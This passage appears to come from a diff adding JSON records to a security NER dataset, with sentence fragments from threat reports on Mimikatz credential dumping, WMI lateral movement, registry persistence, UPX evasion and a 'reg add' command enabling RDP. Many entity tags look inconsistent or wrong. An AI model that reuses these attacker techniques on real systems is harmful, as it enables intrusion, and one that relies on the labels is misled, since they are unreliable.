"discovery", + "on", + "the", + "host", + "using", + "built-in", + "Windows", + "utilities", + "like", + "ipconfig" + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "systeminfo" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "systeminfo" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "WMI", + "was", + "used", + "to", + "pivot", + "to", + "a", + "domain", + "controller", + "on", + "the", + "network." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actor", + "leveraged", + "Impacket’s", + "wmiexec.py", + "to", + "execute", + "commands", + "with", + "a", + "semi-interactive", + "shell" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "interacts", + "with", + "remote", + "endpoints", + "via", + "WMI" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "a", + "number", + "of", + "WMI", + "requests", + "via", + "DCERPC", + "from", + "one", + "endpoint", + "to", + "a", + "target", + "endpoint", + "based", + "on", + "the", + "ports." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "‘Powershell.exe’", + "process", + "initiated", + "the", + "WMI", + "requests." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "One", + "of", + "the", + "observed", + "commands", + "invoked", + "via", + "WMI", + "was", + "‘firefox.exe’." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "The", + "commands", + "executed", + "included", + "directory", + "traversal," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Tool", + "Used", + "to", + "Steal", + "Sensitive", + "Information" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "proxying", + "the", + "traffic" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "initiating", + "a", + "proxied" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Several", + "HTTP", + "Post", + "events", + "were", + "observed", + "to", + "the", + "identified", + "domains" + ], + "ner_tags": [ + "O", + "B-Org", + "I-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTP", + "stream", + "containing", + "the", + "content" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "POST", + "event", + "included", + "a", + "MIME", + "part", + "indicating", + "file", + "upload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "file", + "that", + "was", + "uploaded", + "775E.bin", + "was", + "deleted", + "by", + "the", + "injected", + "‘Explorer.exe’", + "process", + "from", + "the", + "target", + "endpoint" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "was", + "able", + "to", + "RDP", + "to", + "a", + "backup", + "server", + "using", + "the", + "admin", + "credentials", + "they", + "acquired." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "script", + "called", + "a", + "combination", + "of", + "QueueUserAPC,", + "GetCurrentThreadId,", + "OpenThread,", + "and", + "VirtualAlloc", + "to", + "perform", + "process", + "injection", + "of", + "shellcode" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "shellcode", + "stored", + "in", + "Base64." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "mounted", + "file", + "contains", + "a", + "hidden", + "folder" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "200+MB", + "padded", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "padding", + "the", + "contents", + "with", + "benign", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "included", + "a", + "standalone", + "file", + "padded", + "with", + "over", + "200MB", + "of", + "blank", + "spaces,", + "likely", + "to", + "impede", + "analysis", + "of", + "the", + "decompressed", + "ISO", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes", + "a", + "CMD", + "file" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "The", + "CMD", + "file", + "contains", + "commands" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "use", + "certutil", + "(renamed", + "here", + "as", + "slaughterhouse.exe)", + "to", + "decode" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decoded", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "thus", + "requires", + "two", + "rounds", + "of", + "decoding", + "using", + "certutil." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "chaining", + "together", + "a", + "series", + "of", + "scripts", + "to", + "decode" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "victim", + "double", + "clicks", + "the", + "ISO", + "to", + "mount", + "it" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Victims", + "can", + "be", + "lured", + "into", + "clicking", + "executable", + "content", + "including", + "binaries,", + "scripts", + "or", + "shortcut", + "files", + "masquerading", + "as", + "benign", + "filetypes", + "such", + "as", + "PDFs", + "or", + "folders." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "DLL", + "is", + "then", + "executed", + "using", + "rundll32" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "and", + "injects", + "Qakbot", + "into", + "wermgr.exe." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "This", + "file", + "is", + "base64", + "twice," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "or", + "unpack", + "the", + "final", + "payload" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "modifies", + "registry", + "keys", + "to", + "maintain", + "persistence," + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Modifies", + "the", + "Windows", + "registry" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "modifies", + "the", + "Windows", + "Registry", + "to", + "allow", + "remote", + "desktop", + "connections" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "establishes", + "persistence", + "through", + "the", + "creation", + "of", + "two", + "keys", + "in", + "CurrentVersion\\Run." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Creates", + "registry", + "key", + "for", + "persistence", + "only" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Creates", + "two", + "registry", + "keys", + "for", + "persistence" + ], + "ner_tags": [ + "O", + "O", + "B-Tool", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Keys", + "found", + "in", + "CurrentVersion\\Run", + "contain", + "references", + "to", + "programs", + "that", + "will", + "execute", + "when", + "a", + "user", + "logs", + "in." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "operators", + "install", + "and", + "execute", + "remote", + "access", + "tools", + "such", + "as", + "Splashtop", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "remote", + "monitoring", + "and", + "management", + "(RMM)", + "software" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "operators", + "use", + "Splashtop", + "to", + "transfer", + "malicious", + "tools", + "from", + "computer", + "to", + "computer", + "in", + "the", + "victim’s", + "environment." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "copies", + "other", + "malicious", + "batch", + "and", + "EXE", + "files", + "from", + "a", + "compromised", + "internal", + "Server", + "Message", + "Block", + "(SMB)", + "server", + "to", + "the", + "newly", + "created", + "temp", + "folder" + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "operators", + "utilize", + "RDP", + "to", + "move", + "laterally", + "in", + "the", + "victim’s", + "environment." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Modifies", + "the", + "Windows", + "registry", + "to", + "allow", + "remote", + "desktop", + "connections." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "operators", + "open", + "up", + "an", + "Remote", + "Desktop", + "Protocol", + "(RDP)", + "port" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "operators", + "use", + "Mimikatz", + "to", + "dump", + "passwords." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "operators", + "use", + "Mimikatz", + "to", + "dump", + "passwords", + "from", + "LSASS." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz,", + "which", + "is", + "a", + "tool", + "used", + "for", + "extracting", + "sensitive", + "information", + "such", + "as", + "passwords", + "and", + "authentication", + "credentials", + "from", + "a", + "Windows", + "operating", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz", + "being", + "leveraged", + "maliciously", + "by", + "threat", + "actors", + "in", + "the", + "following", + "ways:", + "Credential", + "Loading", + "Mimikatz", + "loads", + "credentials", + "from", + "various", + "sources", + "such", + "as", + "Windows", + "memory,", + "Local", + "Security", + "Authority", + "Subsystem", + "Service", + "(LSASS)", + "process" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz", + "allows", + "the", + "user", + "to", + "manipulate", + "the", + "dumped", + "credentials," + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "a", + "small,", + "UPX-packed", + "password", + "protected", + "binary" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "version", + "of", + "Mimikatz", + "has", + "been", + "compressed", + "using", + "UPX" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "While", + "UPX", + "is", + "often", + "legitimately", + "used", + "to", + "reduce", + "file", + "size,", + "we", + "have", + "observed", + "threat", + "actors", + "utilizing", + "UPX", + "and", + "other", + "packing", + "programs", + "to", + "evade", + "static", + "detection", + "of", + "the", + "underlying", + "payload." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "operators", + "use", + "UPX", + "to", + "pack", + "DC2.exe", + "and", + "DC4.exe", + "to", + "avoid", + "static", + "signature", + "detection." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "batch", + "file", + "makes", + "the", + "following", + "changes", + "to", + "the", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes", + "an", + "embedded", + "batch", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "a", + "batch", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "a", + "batch", + "script", + "that", + "creates", + "a", + "new", + "user" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "creates", + "a", + "batch", + "script", + "that," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "a", + "batch", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Disables", + "the", + "User", + "Account", + "Control", + "(UAC)" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attempting", + "to", + "use", + "sc", + "stop", + "and", + "taskkill", + "to", + "stop", + "over", + "100", + "services", + "related", + "to", + "various", + "areas", + "ranging", + "from", + "remote", + "desktop", + "tools", + "to", + "Windows", + "Defender" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org" + ] + }, + { + "tokens": [ + "The", + "HTML", + "code", + "in", + "this", + "file", + "contains", + "embedded", + "JavaScript", + "functionality," + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "cleanup", + "script", + "used", + "to", + "remove", + "evidence", + "of", + "the", + "attack", + "on", + "a", + "system" + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-OffAct", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cleanup", + "scripts", + "from", + "other", + "threat", + "actors", + "are", + "usually", + "smaller", + "and", + "more", + "specific", + "to", + "the", + "tools", + "used", + "by", + "that", + "actor." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "adds", + "an", + "additional", + "layer", + "of", + "obfuscation", + "to", + "the", + "code" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "password-protected", + "executables", + "to", + "obfuscate", + "malware" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "operators", + "used", + "Splashtop", + "–", + "a", + "remote", + "access", + "and", + "management", + "(RMM)", + "tool", + "–", + "to", + "transfer", + "the", + "following", + "malware", + "into", + "the", + "target’s", + "environment." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "operators", + "use", + "Splashtop", + "to", + "move", + "laterally", + "and", + "transfer", + "malware", + "between", + "compromised", + "hosts", + "in", + "the", + "victim’s", + "environment." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Purp", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "utilize", + "Splashtop", + "to", + "transfer", + "netscan.exe,", + "netscan.lic,", + "netscan.xml,", + "newuser.bat,", + "start.bat", + "and", + "turnoff.bat." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "operators", + "delete", + "files", + "such", + "as", + "mim.exe,", + "mim32.exe,", + "zam.exe", + "and", + "zam.bat", + "to", + "cover", + "their", + "tracks" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "hid", + "the", + "installer", + "for", + "Advanced", + "Port", + "Scanner", + "within", + "Inno", + "Setup", + "installer", + "to", + "evade", + "static", + "signature", + "detection." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "employing", + "a", + "combination", + "of", + "outdated", + "Microsoft", + "Office", + "document", + "vulnerabilities" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Exp", + "I-Exp", + "I-Exp", + "I-Exp" + ] + }, + { + "tokens": [ + "exploit", + "vulnerabilities", + "in", + "Microsoft", + "Word’s", + "Equation", + "Editor" + ], + "ner_tags": [ + "I-Exp", + "I-Exp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "leverages", + "a", + "specific", + "set", + "of", + "vulnerabilities,", + "including", + "CVE-2018-0802,", + "CVE-2018-0798,", + "and", + "CVE-2017-11882,", + "within", + "the", + "Equation", + "Editor", + "of", + "Microsoft", + "Office" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "employs", + "a", + "forged", + "document", + "linked", + "to", + "G7", + "to", + "target", + "various", + "governments", + "within", + "the", + "G20", + "forum." + ], + "ner_tags": [ + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "spam", + "email", + "comprising", + "an", + "attached", + "MS", + "Office", + "document" + ], + "ner_tags": [ + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "employ", + "the", + "remote", + "template", + "injection", + "method", + "to", + "retrieve", + "the", + "next", + "stage", + "of", + "the", + "malware", + "from", + "the", + "TA’s", + "Command-and-Control", + "(C&C)", + "server." + ], + "ner_tags": [ + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "download", + "of", + "a", + "new", + "payload", + "from", + "the", + "attacker’s", + "remote", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O" + ] + }, + { + "tokens": [ + "download", + "a", + "backdoor", + "module." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloads", + "and", + "executes", + "a", + "malicious", + "backdoor" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "enables", + "the", + "TAs", + "to", + "create", + "customized", + "documents", + "containing", + "embedded", + "objects", + "that", + "exploit", + "vulnerabilities", + "in", + "Microsoft", + "Word’s", + "Equation", + "Editor" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "drops", + "an", + "embedded", + "payload,", + "which", + "is", + "a", + "DLL", + "file" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "includes", + "both", + "an", + "encrypted", + "payload", + "and", + "shellcode" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypts", + "the", + "collected", + "information", + "using", + "RC4", + "encryption", + "with", + "the", + "key", + "“xkYgv127”", + "and", + "encodes", + "it", + "using", + "base64." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "proceeds", + "to", + "decrypt" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "scheduled", + "task", + "entry," + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes", + "the", + "export", + "function", + "“StartA”", + "from", + "the", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "rundll32.exe" + ], + "ner_tags": [ + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "utilizing", + "the", + "“rundll32.exe”", + "command" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "loader", + "is", + "executed", + "through", + "rundll32.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "hostname,", + "operating", + "system", + "name,", + "OS", + "version,", + "username," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gather", + "computer-specific", + "information", + "such", + "as", + "computer", + "name,", + "username,", + "gateway", + "address,", + "network", + "adapter", + "details,", + "Windows", + "version,", + "and", + "user", + "type" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Internet", + "information," + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Retrieve", + "TCP/UDP", + "tables" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "presence", + "of", + "any", + "installed", + "anti-virus", + "software", + "on", + "the", + "machine." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "data", + "is", + "then", + "exfiltrated", + "using", + "the", + "below", + "C&C", + "URL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "data", + "is", + "then", + "exfiltrated", + "using", + "the", + "below", + "C&C", + "URL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C&C", + "server", + "responds", + "with", + "the", + "next", + "stage", + "executable" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "loader", + "establishes", + "a", + "connection", + "with", + "a", + "C&C", + "server", + "in", + "the", + "final", + "stage", + "of", + "the", + "attack." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Capture", + "screenshots", + "of", + "victims’", + "system" + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Obtain", + "information", + "about", + "processes", + "and", + "services", + "running", + "on", + "the", + "machine" + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Retrieve", + "information", + "about", + "registry", + "keys" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "the", + "remote", + "process", + "execution", + "tool", + "PSExec", + "to", + "execute", + "batch", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Copy", + "down", + "batch", + "scriptsExecute", + "batch", + "scripts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "defaultChanges", + "the", + "Windows", + "Shell", + "from", + "Explorer", + "to", + "their", + "malicious", + "script" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exe└──cmd.exe:", + "C:\\Windows\\system32\\cmd.exe", + "/c", + "\"\"rdp.bat\"" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "executes", + "the", + "shell", + "(file2.bat)," + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "tries", + "to", + "start", + "its", + "defined", + "shell", + "which", + "has", + "been", + "swapped", + "to", + "a", + "batch", + "script", + "(file2.bat)", + "by", + "the", + "malicious", + "actor." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Command", + "line", + "flags", + "may", + "be", + "used", + "to", + "change", + "this", + "behavior", + "and", + "invoke", + "one", + "or", + "more", + "of", + "the", + "modules." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "that", + "would", + "cause", + "registry", + "changes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "reg.exe:", + "reg", + "add", + "\"HKLM\\System\\CurrentControlSet\\Control\\Terminal", + "Server\"", + "/v", + "\"fDenyTSConnections\"", + "/t", + "REG_DWORD", + "/d", + "0", + "/" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Sets", + "various", + "registry", + "values" + ], + "ner_tags": [ + "B-Features", + "I-Features", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "to", + "enable", + "Remote", + "Desktop", + "sessions", + "(RDP)", + "using", + "reg.exe." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "malicious", + "actor", + "retrieved", + "system", + "administration", + "tools", + "and", + "malicious", + "payloads", + "by", + "using", + "the", + "Background", + "Intelligent", + "Transfer", + "Service" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Storing", 